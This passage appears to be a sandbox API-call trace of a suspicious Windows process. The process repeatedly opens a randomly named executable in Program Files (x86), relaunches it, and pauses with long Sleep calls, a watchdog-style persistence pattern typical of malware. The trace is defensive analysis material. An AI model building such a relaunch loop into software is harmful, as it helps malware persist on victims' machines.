NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.724] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1d20, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.725] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.725] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64900) returned 1 [0194.725] NtClose (Handle=0x1d20) returned 0x0 [0194.727] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1c98, hThread=0x1d20, dwProcessId=0x123c, dwThreadId=0x1060), hNewToken=0x0) returned 1 [0194.741] Sleep (dwMilliseconds=0x1388) [0194.743] Sleep (dwMilliseconds=0x1388) [0194.744] Sleep (dwMilliseconds=0x1388) [0194.746] Sleep (dwMilliseconds=0x1388) [0194.747] Sleep (dwMilliseconds=0x1388) [0194.749] Sleep (dwMilliseconds=0x1388) [0194.750] Sleep (dwMilliseconds=0x1388) [0194.755] Sleep (dwMilliseconds=0x1388) [0194.756] Sleep (dwMilliseconds=0x1388) [0194.757] Sleep (dwMilliseconds=0x1388) [0194.759] Sleep (dwMilliseconds=0x1388) [0194.760] Sleep (dwMilliseconds=0x1388) [0194.762] Sleep (dwMilliseconds=0x1388) [0194.763] Sleep (dwMilliseconds=0x1388) [0194.765] Sleep (dwMilliseconds=0x1388) [0194.766] Sleep (dwMilliseconds=0x1388) [0194.772] Sleep (dwMilliseconds=0x1388) [0194.773] Sleep (dwMilliseconds=0x1388) [0194.775] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.775] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1984, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.775] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.775] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65480) returned 1 [0194.775] NtQueryInformationFile (in: FileHandle=0x1984, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0194.775] NtClose (Handle=0x1984) returned 0x0 [0194.775] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.775] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1984, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.775] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.775] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65080) returned 1 [0194.775] NtClose (Handle=0x1984) returned 0x0 [0194.778] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1d08, hThread=0x1984, dwProcessId=0x1010, dwThreadId=0xef8), hNewToken=0x0) returned 1 [0194.791] Sleep (dwMilliseconds=0x1388) [0194.792] Sleep (dwMilliseconds=0x1388) [0194.794] Sleep (dwMilliseconds=0x1388) [0194.795] Sleep (dwMilliseconds=0x1388) [0194.797] Sleep (dwMilliseconds=0x1388) [0194.799] Sleep (dwMilliseconds=0x1388) [0194.808] Sleep (dwMilliseconds=0x1388) [0194.810] Sleep (dwMilliseconds=0x1388) [0194.811] Sleep (dwMilliseconds=0x1388) [0194.812] Sleep (dwMilliseconds=0x1388) [0194.814] Sleep (dwMilliseconds=0x1388) [0194.815] Sleep (dwMilliseconds=0x1388) [0194.817] Sleep (dwMilliseconds=0x1388) [0194.821] Sleep (dwMilliseconds=0x1388) [0194.822] Sleep (dwMilliseconds=0x1388) [0194.823] Sleep (dwMilliseconds=0x1388) [0194.825] Sleep (dwMilliseconds=0x1388) [0194.826] Sleep (dwMilliseconds=0x1388) [0194.828] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.828] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1ccc, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.829] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.829] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64400) returned 1 [0194.829] NtQueryInformationFile (in: FileHandle=0x1ccc, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0194.829] NtClose (Handle=0x1ccc) returned 0x0 [0194.829] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.829] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1ccc, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.829] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.829] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0194.829] NtClose (Handle=0x1ccc) returned 0x0 [0194.831] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1b74, hThread=0x1ccc, dwProcessId=0x119c, dwThreadId=0x4d8), hNewToken=0x0) returned 1 [0194.845] Sleep (dwMilliseconds=0x1388) [0194.846] Sleep (dwMilliseconds=0x1388) [0194.848] Sleep (dwMilliseconds=0x1388) [0194.860] Sleep (dwMilliseconds=0x1388) [0194.862] Sleep (dwMilliseconds=0x1388) [0194.865] Sleep (dwMilliseconds=0x1388) [0194.866] Sleep (dwMilliseconds=0x1388) [0194.868] Sleep (dwMilliseconds=0x1388) [0194.869] Sleep (dwMilliseconds=0x1388) [0194.871] Sleep (dwMilliseconds=0x1388) [0194.875] Sleep (dwMilliseconds=0x1388) [0194.877] Sleep (dwMilliseconds=0x1388) [0194.878] Sleep (dwMilliseconds=0x1388) [0194.880] Sleep (dwMilliseconds=0x1388) [0194.881] Sleep (dwMilliseconds=0x1388) [0194.883] Sleep (dwMilliseconds=0x1388) [0194.884] Sleep (dwMilliseconds=0x1388) [0194.886] Sleep (dwMilliseconds=0x1388) [0194.887] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.887] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1d00, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.888] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.888] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65480) returned 1 [0194.888] NtQueryInformationFile (in: FileHandle=0x1d00, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0194.888] NtClose (Handle=0x1d00) returned 0x0 [0194.888] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.888] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1d00, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0194.888] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0194.888] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64400) returned 1 [0194.888] NtClose (Handle=0x1d00) returned 0x0 [0194.893] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1f94, hThread=0x1d00, dwProcessId=0x1178, dwThreadId=0x11ac), hNewToken=0x0) returned 1 [0194.909] Sleep (dwMilliseconds=0x1388) [0194.910] Sleep (dwMilliseconds=0x1388) [0196.200] Sleep (dwMilliseconds=0x1388) [0197.048] Sleep (dwMilliseconds=0x1388) [0197.562] Sleep (dwMilliseconds=0x1388) [0198.102] Sleep (dwMilliseconds=0x1388) [0198.444] Sleep (dwMilliseconds=0x1388) [0198.522] Sleep (dwMilliseconds=0x1388) [0198.583] Sleep (dwMilliseconds=0x1388) [0198.591] Sleep (dwMilliseconds=0x1388) [0198.641] Sleep (dwMilliseconds=0x1388) [0198.710] Sleep (dwMilliseconds=0x1388) [0198.756] Sleep (dwMilliseconds=0x1388) [0198.771] Sleep (dwMilliseconds=0x1388) [0199.520] Sleep (dwMilliseconds=0x1388) [0199.652] Sleep (dwMilliseconds=0x1388) [0199.746] Sleep (dwMilliseconds=0x1388) [0199.862] Sleep (dwMilliseconds=0x1388) [0199.922] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.922] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1398, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0199.922] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0199.922] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65080) returned 1 [0199.922] NtQueryInformationFile (in: FileHandle=0x1398, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0199.923] NtClose (Handle=0x1398) returned 0x0 [0199.924] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.924] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1398, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0199.924] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0199.924] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64180) returned 1 [0199.924] NtClose (Handle=0x1398) returned 0x0 [0199.926] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x139c, hThread=0x1398, dwProcessId=0x780, dwThreadId=0x4b0), hNewToken=0x0) returned 1 [0199.935] Sleep (dwMilliseconds=0x1388) [0199.936] Sleep (dwMilliseconds=0x1388) [0199.938] Sleep (dwMilliseconds=0x1388) [0199.939] Sleep (dwMilliseconds=0x1388) [0199.941] Sleep (dwMilliseconds=0x1388) [0199.942] Sleep (dwMilliseconds=0x1388) [0199.944] Sleep (dwMilliseconds=0x1388) [0199.945] Sleep (dwMilliseconds=0x1388) [0199.947] Sleep (dwMilliseconds=0x1388) [0199.948] Sleep (dwMilliseconds=0x1388) [0199.950] Sleep (dwMilliseconds=0x1388) [0199.951] Sleep (dwMilliseconds=0x1388) [0199.953] Sleep (dwMilliseconds=0x1388) [0199.954] Sleep (dwMilliseconds=0x1388) [0199.959] Sleep (dwMilliseconds=0x1388) [0199.961] Sleep (dwMilliseconds=0x1388) [0199.962] Sleep (dwMilliseconds=0x1388) [0199.964] Sleep (dwMilliseconds=0x1388) [0199.965] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.965] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1710, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0199.965] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0199.966] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64380) returned 1 [0199.966] NtQueryInformationFile (in: FileHandle=0x1710, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0199.966] NtClose (Handle=0x1710) returned 0x0 [0199.966] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.966] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1710, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0199.966] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0199.966] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64c00) returned 1 [0199.966] NtClose (Handle=0x1710) returned 0x0 [0199.969] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1250, hThread=0x1710, dwProcessId=0x514, dwThreadId=0x960), hNewToken=0x0) returned 1 [0199.999] Sleep (dwMilliseconds=0x1388) [0200.001] Sleep (dwMilliseconds=0x1388) [0200.002] Sleep (dwMilliseconds=0x1388) [0200.004] Sleep (dwMilliseconds=0x1388) [0200.005] Sleep (dwMilliseconds=0x1388) [0200.006] Sleep (dwMilliseconds=0x1388) [0200.008] Sleep (dwMilliseconds=0x1388) [0200.009] Sleep (dwMilliseconds=0x1388) [0200.012] Sleep (dwMilliseconds=0x1388) [0200.013] Sleep (dwMilliseconds=0x1388) [0200.015] Sleep (dwMilliseconds=0x1388) [0200.016] Sleep (dwMilliseconds=0x1388) [0200.018] Sleep (dwMilliseconds=0x1388) [0200.020] Sleep (dwMilliseconds=0x1388) [0200.021] Sleep (dwMilliseconds=0x1388) [0200.023] Sleep (dwMilliseconds=0x1388) [0200.024] Sleep (dwMilliseconds=0x1388) [0200.026] Sleep (dwMilliseconds=0x1388) [0200.027] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.027] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1268, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0200.027] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0200.028] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65080) returned 1 [0200.028] NtQueryInformationFile (in: FileHandle=0x1268, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0200.028] NtClose (Handle=0x1268) returned 0x0 [0200.028] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.028] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1268, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0200.028] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: 